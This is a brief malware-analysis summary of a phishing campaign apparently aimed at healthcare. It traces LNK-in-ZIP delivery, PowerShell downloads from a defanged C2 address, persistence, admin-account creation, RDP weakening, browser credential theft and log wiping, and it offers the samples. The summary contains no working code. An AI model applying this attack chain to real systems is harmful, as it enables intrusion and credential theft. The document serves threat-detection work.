Summary:

• The attack starts with a malicious LNK file delivered within a ZIP file, likely distributed through phishing emails, and seems to target the healthcare industry.
• Upon execution, the LNK file initiates a PowerShell command that downloads multiple scripts and batch files from a remote server to establish persistence and control over the victim’s system.

1. • The LNK file, once opened, triggers PowerShell commands that download additional payloads from hxxp://157.173.104[.]153.
   • These scripts enable the attacker to create a new user account with administrative privileges and alter RDP settings, reducing authentication requirements for easier unauthorized access.
2. • A persistent shortcut (LNK) file is created in the Windows Startup folder to maintain access.
   • The primary PowerShell script communicates with the C2 server, constructing URLs with a unique identifier (UID) for the compromised machine to fetch commands or additional payloads.
   • If UAC is detected as weak or disabled, the attack proceeds with further stages that lower the system's security configurations.
3. • A secondary payload, "ChromePass," is introduced, targeting Chromium-based browsers to harvest stored credentials, escalating the risk of compromised accounts.
   • Scripts configure the system to facilitate remote desktop access, enabling actions such as data exfiltration, monitoring, and installation of further malware.
4. • Subsequent batch files (e.g., k1.bat, scheduler-once.bat) execute commands that hide traces, remove logs, and schedule tasks disguised as system operations to maintain persistence and evade detection.
   • The final stages involve the execution of a PowerShell script that performs reconnaissance, collects extensive system data, and sends it encoded to the C2 server.

 
Download. Email me if you need the password scheme.